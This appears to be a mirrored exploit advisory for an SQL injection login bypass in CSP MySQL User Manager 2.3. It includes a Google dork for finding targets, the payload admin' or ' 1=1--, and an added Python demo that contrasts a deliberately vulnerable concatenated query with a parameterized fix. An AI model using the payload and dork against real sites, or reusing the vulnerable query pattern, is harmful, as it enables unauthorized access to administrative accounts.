CSP MySQL User Manager 2.3 SQL Injection

CVE: N/A
Category: CWE-89
Price: N/A
Severity: High
Author: N/A
Risk: High
Exploitation Type: Remote
Date: 2014-01-09
CPE: cpe:cpe:/a:mysql:mysql-user-manager:2.3
Our sensors found this exploit at: http://cxsecurity.com/ascii/WLB-2014010045

Below is a copy:

# Exploit Title: CSP MySQL User Manager v2.3 SQL Injection Authentication Bypass
# Google Dork: intitle:"CSP MySQL User Manager"
# Date: 8/1/2013
# Exploit Author: Youssef mami
# Vendor Homepage: https://code.google.com/p/cspmum/
# Software Link: https://code.google.com/p/cspmum/downloads/detail?name=cmum-23.zip&can=2&q=
# Version: 2.3
# Tested on: Linux 2.6.38-11
# CVE : nothing
##################################################################################
SQL Injection Authentication Bypass
Product Page: https://code.google.com/p/cspmum/downloads/detail?name=cmum-23.zip&can=2&q=

Author(Pentester): Youssef mami ([email protected])
On Web: www.hammamet-services.com and http://hiservices.blogspot.com (our blog)
On Social: www.facebook.com/hammamet.informatique and https://twitter.com/hammamet_info
##################################################################################
We just need to input the admin login like this: admin' or ' 1=1-- and any password :-)
login : admin' or ' 1=1--
password: hammamet informatique services
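
Why the login value above is accepted, and the fix, shown as an added example that is not part of the original advisory or the product's code. It assumes the login check builds its query by string concatenation; the table, column names, stored password and the use of SQLite in place of MySQL are assumptions made so the example runs offline.

```python
import sqlite3

# The advisory's login value, copied from the page.
PAYLOAD = "admin' or ' 1=1--"

def make_db():
    # Constructed sample table; schema and stored password are assumptions.
    # (Plaintext is used only to keep the demo short.)
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (login TEXT PRIMARY KEY, password TEXT)")
    db.execute("INSERT INTO users VALUES ('admin', 'constructed-secret')")
    return db

def build_concat_sql(login, password):
    # Vulnerable pattern: input is pasted into the SQL text.
    return ("SELECT login FROM users WHERE login = '%s' AND password = '%s'"
            % (login, password))

def login_concat(db, login, password):
    # With PAYLOAD the WHERE clause parses as
    #   login = 'admin' OR (' 1=1--' AND password = '...')
    # because AND binds tighter than OR; the "--" sits inside a string
    # literal, so the password test is never needed for the admin row.
    return db.execute(build_concat_sql(login, password)).fetchone() is not None

def login_bound(db, login, password):
    # Hardened pattern: placeholders send input as data, never as SQL.
    sql = "SELECT login FROM users WHERE login = ? AND password = ?"
    return db.execute(sql, (login, password)).fetchone() is not None

if __name__ == "__main__":
    db = make_db()
    for name, fn in (("concatenated", login_concat), ("bound", login_bound)):
        print(name, "payload accepted:", fn(db, PAYLOAD, "any password"))
        print(name, "valid login accepted:", fn(db, "admin", "constructed-secret"))
    print(build_concat_sql(PAYLOAD, "any password"))
```

With bound parameters the whole login string is compared as a literal value, so the quote characters no longer change the structure of the query.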


